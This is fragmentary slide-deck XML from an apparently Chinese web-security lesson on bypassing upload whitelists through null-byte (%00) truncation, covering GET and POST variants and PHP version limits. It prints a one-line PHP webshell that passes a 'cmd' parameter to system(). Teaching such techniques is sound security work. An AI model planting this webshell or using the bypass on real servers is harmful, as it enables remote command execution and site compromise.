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文件上传-绕过白名单验证（00截断绕过）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一句话代码执行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中的函数</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>system</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>执行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提交的参数。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&lt;?php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if($_GET){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$cmd = $_GET["cmd"];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 system($cmd) ;	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}else{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echo "no cmd";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?&gt;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25" y="1595120"/>
            <a:ext cx="6329045" cy="4087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3336290" cy="1461770"/>
            <a:chOff x="4298950" y="2302193"/>
            <a:chExt cx="333629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2977550" cy="521970"/>
              <a:chOff x="3702051" y="2108518"/>
              <a:chExt cx="297755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247015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1. 00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截断原理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28143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截断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427980" cy="1458912"/>
            <a:chOff x="4298950" y="4113213"/>
            <a:chExt cx="542798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75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截断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8437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一句话代码执行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3336290" cy="1461770"/>
            <a:chOff x="4298950" y="2302193"/>
            <a:chExt cx="333629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2977550" cy="521970"/>
              <a:chOff x="3702051" y="2108518"/>
              <a:chExt cx="297755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247015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1. 00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截断原理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28143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截断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427980" cy="1458912"/>
            <a:chOff x="4298950" y="4113213"/>
            <a:chExt cx="542798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753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截断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8437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一句话代码执行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截断原理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221105"/>
            <a:ext cx="108362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0x00是十六进制表示方法，是ascii码为0的字符，在有些函数处理时，会把这个字符当做结束符。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系统在对文件名的读取时，如果遇到0x00，就会认为读取已结束。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395" y="3718560"/>
            <a:ext cx="10836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PHP5.3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>之后的版本中完全修复了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>截断。并且</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>截断受限与</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GPC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addslashes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>函数。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081655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695" y="2203450"/>
            <a:ext cx="8369300" cy="3784600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic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5349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型提交的内容会被自动进行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解码。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注意：一定要关闭</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GPC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>，否则无法成功。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5" y="1898650"/>
            <a:ext cx="7140575" cy="4914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请求中，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>%00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>不会被自动解码，需要在</a:t>
            </a:r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禁止中进行修改</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>00.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2211705"/>
            <a:ext cx="8820150" cy="330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902460"/>
            <a:ext cx="9886315" cy="4258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一句话代码执行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00截断原理</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>GET型00截断</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>POST型00截断</vt:lpstr>
      <vt:lpstr>PowerPoint 演示文稿</vt:lpstr>
      <vt:lpstr>一句话代码执行Webshell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145</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-08-20T13:57:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-12-05T03:57:41Z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